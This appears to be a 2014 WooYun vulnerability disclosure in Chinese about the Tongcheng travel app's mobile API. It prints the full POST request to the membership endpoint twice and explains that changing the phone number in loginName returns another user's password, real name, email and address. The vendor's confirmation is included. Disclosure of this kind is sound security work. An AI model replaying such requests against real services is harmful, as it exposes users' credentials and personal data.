漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:同程网APP设计不当泄露用户大量资料
漏洞作者: 蜉蝣
提交时间:2014-01-10 13:32
修复时间:2014-04-10 13:32
公开时间:2014-04-10 13:32
漏洞类型:用户敏感数据泄漏
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情 披露状态:
2014-01-10: 细节已通知厂商并且等待厂商处理中 2014-01-10: 厂商已经确认,细节仅向厂商公开 2014-01-13: 细节向第三方安全合作伙伴开放 2014-03-06: 细节向核心白帽子及相关领域专家公开 2014-03-16: 细节向普通白帽子公开 2014-03-26: 细节向实习白帽子公开 2014-04-10: 细节向公众公开
简要描述: 应该算是通用漏洞吧
详细说明: APP登陆账号后 有个POST包
POST /MobileAPI/membership/membershiphandler.ashx HTTP/1.1 Accept-Encoding: gzip Content-Type: application/json;charset=utf-8 Content-Length: 428 User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.0.4; GT-I9100G Build/IMM76D) Host: tcmobileapi.17usoft.com Connection: Keep-Alive {"request":{"body":{"clientInfo":{"clientIp":"192.168.0.103","deviceId":"354016054666357","pushInfo":"","refId":"18241320","versionNumber":"5.3.0","versionType":"android"},"memberId":"27581001","loginName":"13999999999"},"header":{"accountID":"c26b007f-c89e-431a-b8cc-493becbdd8a2","digitalSign":"47db96e89b881b671ca4dda938198ca6","reqTime":"2014-01-10 12:41:49.070","serviceName":"QueryMemberInfo","version":"20111128102912"}}}
修改13999999999改为指定手机即可获取该手机号对应的memberId loginName password oldPassword userName" trueName email mobile phone sex province city postCode address msn qq memberType..........
漏洞证明: APP登陆账号后 有个POST包
POST /MobileAPI/membership/membershiphandler.ashx HTTP/1.1 Accept-Encoding: gzip Content-Type: application/json;charset=utf-8 Content-Length: 428 User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.0.4; GT-I9100G Build/IMM76D) Host: tcmobileapi.17usoft.com Connection: Keep-Alive {"request":{"body":{"clientInfo":{"clientIp":"192.168.0.103","deviceId":"354016054666357","pushInfo":"","refId":"18241320","versionNumber":"5.3.0","versionType":"android"},"memberId":"27581001","loginName":"13999999999"},"header":{"accountID":"c26b007f-c89e-431a-b8cc-493becbdd8a2","digitalSign":"47db96e89b881b671ca4dda938198ca6","reqTime":"2014-01-10 12:41:49.070","serviceName":"QueryMemberInfo","version":"20111128102912"}}}
修改13999999999改为指定手机即可获取该手机号对应的memberId loginName password oldPassword userName" trueName email mobile phone sex province city postCode address msn qq memberType..........
修复方案: 版权声明:转载请注明来源 蜉蝣 @乌云
漏洞回应 厂商回应: 危害等级:中
漏洞Rank:5
确认时间:2014-01-10 17:25
厂商回复: 感谢 @蜉蝣 正在修复中!
最新状态: 暂无
漏洞评价:
评论
2014-01-10 14:26 |
带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:143 | 心在,梦在)
2014-01-10 14:36 |
xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)
2014-01-10 17:21 |
忆闪而过 ( 路人 | Rank:26 漏洞数:6 | 寂寞在唱歌)
2014-01-10 17:31 |
蜉蝣 ( 实习白帽子 | Rank:93 漏洞数:24 )